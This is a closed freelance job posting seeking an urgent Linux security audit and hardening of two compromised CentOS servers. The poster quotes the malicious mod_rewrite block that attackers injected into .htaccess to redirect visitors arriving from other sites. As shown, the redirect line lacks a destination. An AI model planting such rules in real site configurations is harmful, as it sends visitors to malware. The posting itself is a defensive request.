ASAP Linux Server Security Audit and Hardening

Closed - This job posting has been filled and work has been completed.

Job Description

We are a good company (check our feedback) looking for someone with advanced linux security experience to perform an audit and hardening on two of our servers.

Both have been compromised. We noticed our sites re-directing to malware sites and several files changed on the system. .htaccess was compromised and the following was inserted.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/ $ [NC]
RewriteRule ^.*$ [L,R]

These are running CentOS. It is all command line, no Cpanel or WHM so you must be very comfortable with that (like any good *nix admin).

We need to identify the security hole and any malicious files on both systems and harden to stop future instances.

I need this done immediately, today. We have change all passwords on the system and deleted the offending text in the .htaccess. I am sure that there are open vulnerabilities in the PHP or apache and possibly a root kit or other malicious files on the system.

After the system has been cleaned I would like to add security layers such as selinux, apparmor to help prevent future issues.

Skills: linux